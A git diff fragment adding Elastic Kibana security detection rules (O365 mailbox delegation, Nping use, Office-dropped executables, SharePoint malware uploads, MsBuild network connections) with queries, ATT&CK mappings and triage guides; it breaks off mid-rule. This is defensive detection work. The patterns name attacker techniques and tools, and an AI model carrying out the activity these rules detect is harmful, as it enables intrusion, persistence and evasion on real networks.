"0ce6487d-8069-4888-9ddd-61b52490cebc_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_105.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_105.json new file mode 100644 index 00000000000..6e3da2a545f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_105.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the assignment of rights to access content from another mailbox. An adversary may use the compromised account to send messages to other accounts in the network of the target organization while creating inbox rules, so messages can evade spam/phishing detection mechanisms.", + "false_positives": [ + "Assignment of rights to a service account." + ], + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Exchange Suspicious Mailbox Right Delegation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "0ce6487d-8069-4888-9ddd-61b52490cebc_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_206.json b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_206.json new file mode 100644 index 00000000000..711aa1224ae --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0ce6487d-8069-4888-9ddd-61b52490cebc_206.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Austin Songer" + ], + "description": "Identifies the assignment of rights to access content from another mailbox. An adversary may use the compromised account to send messages to other accounts in the network of the target organization while creating inbox rules, so messages can evade spam/phishing detection mechanisms.", + "false_positives": [ + "Assignment of rights to a service account." + ], + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "O365 Exchange Suspicious Mailbox Right Delegation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.action:Add-MailboxPermission and\no365.audit.Parameters.AccessRights:(FullAccess or SendAs or SendOnBehalf) and event.outcome:success and\nnot user.id : \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.Servicehost)\"\n", + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "o365.audit.Parameters.AccessRights", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "0ce6487d-8069-4888-9ddd-61b52490cebc", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "low", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.002", + "name": "Additional Email Delegate Permissions", + "reference": "https://attack.mitre.org/techniques/T1098/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "0ce6487d-8069-4888-9ddd-61b52490cebc_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_108.json b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_108.json new file mode 100644 index 00000000000..e74e23be3ba --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0d69150b-96f8-467c-a86d-a67a3378ce77_108.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Nping ran on a Linux host. Nping is part of the Nmap tool suite and has the ability to construct raw packets for a wide variety of security testing applications, including denial of service testing.", + "false_positives": [ + "Some normal use of this command may originate from security engineers and network or server administrators, but this is usually not routine or unannounced. Use of `Nping` by non-engineers or ordinary users is uncommon." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Nping Process Activity", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and process.name == \"nping\"\n", + "references": [ + "https://en.wikipedia.org/wiki/Nmap" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0d69150b-96f8-467c-a86d-a67a3378ce77", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "0d69150b-96f8-467c-a86d-a67a3378ce77_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109.json b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109.json new file mode 100644 index 00000000000..67b4c7dc34f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable created by a Microsoft Office application and subsequently executed. These processes are often launched via scripts inside documents or during exploitation of Microsoft Office applications.", + "from": "now-120m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of File Written or Modified by Microsoft Office", + "note": "## Triage and analysis\n\n### Investigating Execution of File Written or Modified by Microsoft Office\n\nMicrosoft Office, a widely used suite of productivity applications, is frequently targeted by attackers due to its popularity in corporate environments. Attackers exploit its extensive capabilities, like macro scripts in Word and Excel, to gain initial access to systems. They often use Office documents as delivery mechanisms for malware or phishing attempts, taking advantage of their trusted status in professional settings.\n\nThis rule searches for executable files written by MS Office applications executed in sequence. This is most likely the result of the execution of malicious documents or exploitation for initial access or privilege escalation. This rule can also detect suspicious processes masquerading as the MS Office applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve MS Office documents received and opened by the user that could cause this behavior. Common locations include, but are not limited to, the Downloads and Document folders and the folder configured at the email client.\n- Determine if the collected files are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n - If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=2h\n [file where host.os.type == \"windows\" and event.type != \"deletion\" and file.extension : \"exe\" and\n (process.name : \"WINWORD.EXE\" or\n process.name : \"EXCEL.EXE\" or\n process.name : \"OUTLOOK.EXE\" or\n process.name : \"POWERPNT.EXE\" or\n process.name : \"eqnedt32.exe\" or\n process.name : \"fltldr.exe\" or\n process.name : \"MSPUB.EXE\" or\n process.name : \"MSACCESS.EXE\")\n ] by host.id, file.path\n [process where host.os.type == \"windows\" and event.type == \"start\" and \n not (process.name : \"NewOutlookInstaller.exe\" and process.code_signature.subject_name : \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ] by host.id, process.executable\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/", + "subtechnique": [ + { + "id": "T1566.001", + "name": "Spearphishing Attachment", + "reference": "https://attack.mitre.org/techniques/T1566/001/" + }, + { + "id": "T1566.002", + "name": "Spearphishing Link", + "reference": "https://attack.mitre.org/techniques/T1566/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "0d8ad79f-9025-45d8-80c1-4f0cd3c5e8e5_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_103.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_103.json new file mode 100644 index 00000000000..4413414c00e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_103.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SharePoint Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_105.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_105.json new file mode 100644 index 00000000000..0868b843b99 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_105.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SharePoint Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_206.json b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_206.json new file mode 100644 index 00000000000..0fcb4882fad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e52157a-8e96-4a95-a6e3-5faae5081a74_206.json @@ -0,0 +1,83 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the occurence of files uploaded to SharePoint being detected as Malware by the file scanning engine. Attackers can use File Sharing and Organization Repositories to spread laterally within the company and amplify their access. Users can inadvertently share these files without knowing their maliciousness, giving adversaries opportunities to gain initial access to other endpoints in the environment.", + "false_positives": [ + "Benign files can trigger signatures in the built-in virus protection" + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SharePoint Malware File Upload", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", + "references": [ + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "high", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Tactic: Lateral Movement" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1080", + "name": "Taint Shared Content", + "reference": "https://attack.mitre.org/techniques/T1080/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_108.json b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_108.json new file mode 100644 index 00000000000..bd2449c10f3 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0e79980b-4250-4a50-a509-69294c14e84b_108.json @@ -0,0 +1,101 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies MsBuild.exe making outbound network connections. This may indicate adversarial activity as MsBuild is often leveraged by adversaries to execute code and evade detection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "MsBuild Making Network Connections", + "note": "## Triage and analysis\n\n### Investigating MsBuild Making Network Connections\n\nBy examining the specific traits of Windows binaries (such as process trees, command lines, network connections, registry modifications, and so on) it's possible to establish a baseline of normal activity. Deviations from this baseline can indicate malicious activity, such as masquerading and deserve further investigation.\n\nThe Microsoft Build Engine, also known as MSBuild, is a platform for building applications. This engine provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy code execution.\n\nThis rule looks for the `Msbuild.exe` utility execution, followed by a network connection to an external address. Attackers can abuse MsBuild to execute malicious files or masquerade as those utilities in order to bypass detections and evade defenses.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\") and\n not dns.question.name : \"localhost\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0e79980b-4250-4a50-a509-69294c14e84b", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + "id": "0e79980b-4250-4a50-a509-69294c14e84b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_110.json b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_110.json new file mode 100644 index 00000000000..5c7c628e0b0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0f4d35e4-925e-4959-ab24-911be207ee6f_110.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors the creation/alteration of the 